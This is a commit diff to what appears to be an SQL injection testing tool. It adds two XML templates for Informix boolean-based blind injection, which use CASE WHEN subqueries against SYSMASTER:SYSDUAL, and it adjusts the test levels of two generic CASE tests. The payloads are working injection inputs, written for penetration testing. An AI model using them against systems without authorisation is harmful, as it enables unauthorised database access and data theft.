Adding Informix parameter replacement payloads (Issue #552)

2025-12-24 08:29:07 +00:00 · 2016-09-27 14:39:17 +02:00
parent bc7ab01066
commit 5079c42788
3 changed files with 43 additions and 5 deletions
--- a/xml/payloads/boolean_blind.xml
+++ b/xml/payloads/boolean_blind.xml
@@ -841,6 +841,44 @@ Tag: <test>
        </details>
    </test>

+    <test>
+        <title>Informix boolean-based blind - Parameter replace</title>
+        <stype>1</stype>
+        <level>3</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
+    <test>
+        <title>Informix boolean-based blind - Parameter replace (original value)</title>
+        <stype>1</stype>
+        <level>4</level>
+        <risk>1</risk>
+        <clause>1,3</clause>
+        <where>3</where>
+        <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</vector>
+        <request>
+            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</payload>
+        </request>
+        <response>
+            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)</comparison>
+        </response>
+        <details>
+            <dbms>Informix</dbms>
+        </details>
+    </test>
+
    <test>
        <title>Microsoft Access boolean-based blind - Parameter replace</title>
        <stype>1</stype>
@@ -917,7 +955,7 @@ Tag: <test>
    <test>
        <title>Boolean-based blind - Parameter replace (CASE)</title>
        <stype>1</stype>
-        <level>3</level>
+        <level>2</level>
        <risk>1</risk>
        <clause>1,3</clause>
        <where>3</where>
@@ -933,7 +971,7 @@ Tag: <test>
    <test>
        <title>Boolean-based blind - Parameter replace (CASE) (original value)</title>
        <stype>1</stype>
-        <level>4</level>
+        <level>3</level>
        <risk>1</risk>
        <clause>1,3</clause>
        <where>3</where>